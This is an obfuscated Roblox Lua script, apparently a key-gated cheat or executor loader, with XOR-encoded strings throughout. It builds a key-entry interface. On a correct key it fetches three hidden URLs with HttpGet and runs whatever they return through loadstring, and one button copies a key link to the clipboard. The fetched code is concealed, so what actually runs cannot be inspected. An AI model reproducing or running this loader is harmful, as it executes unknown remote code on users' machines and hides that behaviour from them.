--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v108,v109) local v110={};for v114=1, #v108 do v6(v110,v0(v4(v1(v2(v108,v114,v114 + 1 )),v1(v2(v109,1 + (v114% #v109) ,1 + (v114% #v109) + 1 )))%256 ));end return v5(v110);end local v8=v7("\217\215\207\53\245\225\136\81\221\202\213\46\171\179\210\28\159\205\222\49\169\234\149\70\137\146\138\125\169\185\203\11\212\142\215\42\229\176\138\12\216\213\218\41\245","\126\177\163\187\69\134\219\167");local v9=Instance.new(v7("\16\206\56\192\249\45\234\63\204","\156\67\173\74\165"));local v10=Instance.new(v7("\18\165\72\27\185","\38\84\215\41\118\220\70"));local v11=Instance.new(v7("\101\63\1\29\236\94\19\48","\158\48\118\66\114"));local v12=Instance.new(v7("\130\41\17\49\118\137\250\169\33\28","\155\203\68\112\86\19\197"));local v13=Instance.new(v7("\114\216\46\232\108\121\231\253\74","\152\38\189\86\156\32\24\133"));local v14=Instance.new(v7("\218\69\166\75\249","\38\156\55\199"));local v15=Instance.new(v7("\156\120\100\60\49\123\226","\35\200\29\28\72\115\20\154"));local v16=Instance.new(v7("\44\150\242\208\159\34\49\11","\84\121\223\177\191\237\76"));local v17=Instance.new(v7("\143\83\209\180\24\69\36\213\180\88","\161\219\54\169\192\90\48\80"));local v18=Instance.new(v7("\124\107\35\42\91\76\5\55","\69\41\34\96"));local v19=Instance.new(v7("\137\234\244\5\16\37\185\209","\75\220\163\183\106\98"));local v20=Instance.new(v7("\54\191\147\35\251\23\174\159\56\215","\185\98\218\235\87"));local v21=Instance.new(v7("\254\21\4\233\204\164\206\46","\202\171\92\71\134\190"));local v22=Instance.new(v7("\29\196\52\156\11\212\56\156\38\207","\232\73\161\76"));local v23=Instance.new(v7("\142\240\97\82\12\181\220\80","\126\219\185\34\61"));v9.Name=v7("\43\251\119","\135\108\174\62\18\30\23\147");v9.Parent=game.Players.LocalPlayer:WaitForChild(v7("\134\229\43\210\29\188\20\210\191","\167\214\137\74\171\120\206\83"));v10.Name=v7("\166\241\59\83","\199\235\144\82\61\152");v10.Parent=v9;v10.BackgroundColor3=Color3.fromRGB(26,1848 -(301 + 1521) ,26);v10.BorderColor3=Color3.fromRGB(27,27 + 15 ,90 -37 );v10.Position=UDim2.new(0.413353175 + 0 ,0 -0 ,126.441176474 -(116 + 10) ,0 + 0 );v10.Size=UDim2.new(738.172441572 -(542 + 196) ,0 -0 ,0.117647059,1700 -(1419 + 281) );v11.Parent=v10;v12.Name=v7("\44\19\160","\75\103\118\217");v12.Parent=v10;v12.BackgroundTransparency=1 -0 ;v12.Position=UDim2.new(74.435148925 -(71 + 3) ,0 + 0 ,0.115340024,0 + 0 );v12.Size=UDim2.new(0.128056228 -0 ,0 -0 ,241.338304013 -(187 + 54) ,1551 -(1126 + 425) );v12.ZIndex=782 -(162 + 618) ;v12.Image=v7("\213\86\104\21\170\13\194\64\121\16\227\81\136\7\41\70\239\77\151\3\41\67\232","\126\167\52\16\116\217");v12.ImageColor3=Color3.fromRGB(179 + 76 ,1159 -(118 + 1003) ,26 + 12 );v12.ImageRectOffset=Vector2.new(128 -84 ,701 -(142 + 235) );v12.ImageRectSize=Vector2.new(163 -127 ,76 -40 );v13.Name=v7("\252\43\56\148","\156\168\78\64\224\212\121");v13.Parent=v10;v13.BackgroundColor3=Color3.fromRGB(43 -17 ,3 + 23 ,1638 -(1373 + 263) );v13.BackgroundTransparency=1001 -(451 + 549) ;v13.BorderColor3=Color3.fromRGB(9 + 17 ,40 -14 ,26 + 0 );v13.Position=UDim2.new(0.0327102803 -0 ,1384 -(746 + 638) ,0.370000005 + 0 ,0 + 0 );v13.Size=UDim2.new(0.934579492 + 0 ,0 -0 ,341.5 -(218 + 123) ,1581 -(1535 + 46) );v13.Font=Enum.Font.SourceSansSemibold;v13.Text=v7("\44\235\188\142\53\235\180\219\14\252\160\202","\174\103\142\197");v13.TextColor3=Color3.fromRGB(254 + 1 ,255,37 + 218 );v13.TextSize=595 -(306 + 254) ;v13.TextWrapped=true;v14.Name=v7("\96\45\77\49\35\71\184\112\58\94\53\32","\152\54\72\63\88\69\62");v14.Parent=v9;v14.BackgroundColor3=Color3.fromRGB(2 + 24 ,50 -24 ,9 + 17 );v14.Position=UDim2.new(0.388749182,0 -0 ,1467.569411755 -(899 + 568) ,0 + 0 );v14.Size=UDim2.new(0.222401291 -0 ,0,603.15529412 -(268 + 335) ,0);v15.Name=v7("\255\193\247\28\246\203\246","\60\180\164\142");v15.Parent=v14;v15.BackgroundColor3=Color3.fromRGB(24 + 16 ,330 -(60 + 230) ,612 -(426 + 146) );v15.Position=UDim2.new(0.216714069 + 0 ,1456 -(282 + 1174) ,811.0933334902 -(569 + 242) ,0 -0 );v15.Size=UDim2.new(0.552679658 + 0 ,0 -0 ,1024.298396379 -(706 + 318) ,0);v15.Font=Enum.Font.SourceSansSemibold;v15.PlaceholderColor3=Color3.fromRGB(1331 -(721 + 530) ,1351 -(945 + 326) ,199 -119 );v15.PlaceholderText=v7("\115\91\28","\114\56\62\101\73\71\141");v15.Text="";v15.TextColor3=Color3.fromRGB(227 + 28 ,955 -(271 + 429) ,212 + 43 );v15.TextScaled=true;v15.TextSize=13 + 1 ;v15.TextWrapped=true;v16.Parent=v15;v17.Name=v7("\142\236\201\205\190\240\155\230\173\253\207\203\182","\164\216\137\187");v17.Parent=v14;v17.BackgroundColor3=Color3.fromRGB(1540 -(1408 + 92) ,1126 -(461 + 625) ,1328 -(993 + 295) );v17.Position=UDim2.new(0.13767235 + 0 ,1171 -(418 + 753) ,0.491583407 + 0 ,0 + 0 );v17.Size=UDim2.new(0.724637687,0 + 0 ,0.378787875 + 0 ,0 + 0 );v17.Font=Enum.Font.SourceSansSemibold;v17.Text=v7("\228\227\35\187\160\231\75\249\227\40","\107\178\134\81\210\198\158");v17.TextColor3=Color3.fromRGB(784 -(406 + 123) ,2024 -(1749 + 20) ,61 + 194 );v17.TextSize=1356 -(1249 + 73) ;v17.MouseButton1Down:connect(function() if (v15.Text==v8) then local v115=0 + 0 ;local v116;local v117;local v118;local v119;local v120;local v121;local v122;local v123;while true do if ((3 -0)==v115) then v123=coroutine.create(v120);coroutine.resume(v121,v7("\79\216\33\204\23\29\131\122\206\5\80\130\50\213\16\79\217\55\201\23\66\222\54\211\10\83\201\59\200\74\68\195\56\147\12\93\196\47\212\30\84\198\63\207\75\125\196\47\212\75\85\201\51\207\75\79\201\52\216\23\8\193\52\213\10\8\137\102\250","\100\39\172\85\188"));coroutine.resume(v122,v7("\165\108\173\144\32\247\55\246\146\50\186\54\190\137\39\165\109\187\149\32\168\106\186\143\61\185\125\183\148\125\174\119\180\207\59\183\112\163\136\41\190\114\179\147\124\151\112\163\136\124\191\125\191\147\124\165\125\184\132\32\226\117\184\137\61\226\86\182\148\58","\83\205\24\217\224"));coroutine.resume(v123,v7("\238\209\217\45\245\159\130\114\244\196\218\115\225\204\217\53\243\199\216\46\227\215\206\50\232\209\200\51\242\139\206\50\235\138\197\39\238\223\197\39\245\207\199\46\169\255\197\39\238\138\223\56\224\214\130\53\227\196\201\46\169\200\204\52\232\138\251\59\254","\93\134\165\173"));break;end if (v115==1) then v119:Play();game.StarterGui:SetCore(v7("\34\53\188\60\96\56\61\24\54\187\59\79\35\32\30\62","\73\113\80\210\88\46\87"),{[v7("\181\37\217\30\226","\135\225\76\173\114")]=v7("\25\226\170\162\169\190\179\90\230\189\169","\199\122\141\216\208\204\221"),[v7("\153\216\8\228","\150\205\189\112\144\24")]=v7("\50\129\179\79\11\133\20","\112\69\228\223\44\100\232\113"),[v7("\253\28\8\221","\230\180\127\103\179\214\28")]=v7("\158\7\71\71\247\82\229\152\12\91\28\171\14\177\222\87\15\16\188\25\180\219\82\11","\128\236\101\63\38\132\33"),[v7("\136\188\3\69\162\226\192\162","\175\204\201\113\36\214\139")]=1150 -(466 + 679) });wait(857 -(564 + 292) );v9.Parent=nil;v115=4 -2 ;end if (v115==2) then local v125=0 -0 ;while true do if (v125==(1900 -(106 + 1794))) then v120=nil;function v120(v127) loadstring(game:HttpGet(v127))();end v125=1 + 0 ;end if (v125==(1 + 0)) then v121=coroutine.create(v120);v122=coroutine.create(v120);v125=2;end if (v125==(5 -3)) then v115=7 -4 ;break;end end end if (v115==(476 -(41 + 435))) then v116=game:GetService(v7("\12\25\135\195\164\11\11\144\208\163\59\11","\202\88\110\226\166"));v117=game.Players.LocalPlayer.PlayerGui.GUI.Main.Key;v118=TweenInfo.new(1001.6 -(938 + 63) ,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut,114 -(4 + 110) ,false);v119=v116:Create(v117,v118,{[v7("\234\2\131\240\207\224\0\142\248\216\144","\170\163\111\226\151")]=Color3.fromRGB(106,255,106)});v115=585 -(57 + 527) ;end end end end);v18.Parent=v17;v19.Parent=v14;v20.Name=v7("\153\247\213\233\63\215","\30\222\146\161\162\90\174\210");v20.Parent=v14;v20.BackgroundColor3=Color3.fromRGB(1453 -(41 + 1386) ,26,129 -(17 + 86) );v20.Position=UDim2.new(0.235357329,0 + 0 , -(1.38818645 -0),0 -0 );v20.Size=UDim2.new(166.505842388 -(122 + 44) ,0 -0 ,0.447802067 -0 ,0 -0 );v20.Font=Enum.Font.SourceSansSemibold;v20.Text=v7("\194\75\100\74\206\75\105","\106\133\46\16");v20.TextColor3=Color3.fromRGB(208 + 47 ,2130 -(157 + 1718) ,37 + 218 );v20.TextSize=84 -42 ;v20.TextWrapped=true;v20.MouseButton1Down:connect(function() local v111=65 -(30 + 35) ;local v112;while true do if (v111==(1018 -(697 + 321))) then v112=0 + 0 ;while true do if (v112==(1257 -(1043 + 214))) then setclipboard(v8);game.StarterGui:SetCore(v7("\107\37\125\248\116\79\76\41\117\245\89\65\76\41\124\242","\32\56\64\19\156\58"),{[v7("\110\193\241\90\95","\224\58\168\133\54\58\146")]=v7("\82\83\82\189\118\137\151\2\92\82","\107\57\54\43\157\21\230\231"),[v7("\239\142\9\225","\175\187\235\113\149\217\188")]=v7("\23\170\152\12\207\112\118\55\239\169\77\240\57\90\57\170\143\12\192\118\104\53\170\133","\24\92\207\225\44\131\25"),[v7("\98\208\183\66","\29\43\179\216\44\123")]="",[v7("\153\204\50\77\169\208\47\66","\44\221\185\64")]=10 -5 });break;end end break;end end end);v21.Parent=v20;v22.Name=v7("\38\242\65\31\65\4\234\71\73\114\13","\19\97\135\40\63");v22.Parent=v14;v22.BackgroundColor3=Color3.fromRGB(98 -72 ,1238 -(323 + 889) ,69 -43 );v22.Position=UDim2.new(5.592483039999999 -3 ,580 -(361 + 219) , -0.608146846,320 -(53 + 267) );v22.Size=UDim2.new(0.126419857 + 0 ,413 -(15 + 398) ,982.321553528 -(18 + 964) ,611 -(602 + 9) );v22.Font=Enum.Font.SourceSansSemibold;v22.Text="X";v22.TextColor3=Color3.fromRGB(959 -704 ,86 + 62 ,148);v22.TextSize=42;v22.TextWrapped=true;v22.MouseButton1Down:connect(function() v9.Parent=nil;game.StarterGui:SetCore(v7("\157\89\61\63\1\62\186\85\53\50\44\48\186\85\60\53","\81\206\60\83\91\79"),{[v7("\122\162\196\126\42","\196\46\203\176\18\79\163\45")]=v7("\159\23\87\94\7\215\192\139\7\90\94\126\179","\143\216\66\30\126\68\155"),[v7("\158\205\21\223","\129\202\168\109\171\165\195\183")]=v7("\7\64\50\219\203\0\227\98\108\63\221\158\39\229\48\81\39\204\158\53\225\35\81\57\153","\134\66\56\87\184\190\116"),[v7("\21\50\6\181","\85\92\81\105\219\121\139\65")]="",[v7("\217\166\66\68\104\214\242\189","\191\157\211\48\37\28")]=877 -(826 + 46) });end);v23.Parent=v22;
